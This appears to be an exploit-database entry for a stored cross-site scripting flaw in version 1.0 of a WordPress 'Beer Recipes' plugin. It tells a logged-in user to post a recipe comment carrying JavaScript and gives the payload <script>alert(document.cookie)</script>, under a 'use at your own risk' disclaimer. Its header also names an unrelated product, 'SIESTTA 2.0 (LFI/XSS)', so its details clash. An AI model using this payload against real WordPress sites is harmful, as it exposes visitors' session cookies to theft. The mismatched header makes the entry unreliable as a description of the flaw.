# Exploit Title: WordPress - Beer Recipes v.1.0 XSS
# Software Link: http://opensourcebrew.org/beer-recipes-plugin/ |
#################################################################### |
# SIESTTA 2.0 (LFI/XSS) Multiple Vulnerabilities |
# download: http://opensourcebrew.org/beer-recipes-plugin/ |
# Author: TheUzuki.' from HF |
# mail: uzuki[@]live[dot]de |
# This was written for educational purpose. Use it at your own risk. |
# Author will be not responsible for any damage. |
#################################################################### |
# Notes: You need to be User at the WordPress Board |
#################################################################### |
--Description of WordPress Plugin-- |
Creates a custom post type for easily entering beer recipes into WordPress |
By Commenting a Beer Recip, with a javascript, the Javascripts,gets executed directly. |
<script>alert(document.cookie)</script>
Fonte: http://www.exploit-db.com/exploits/17453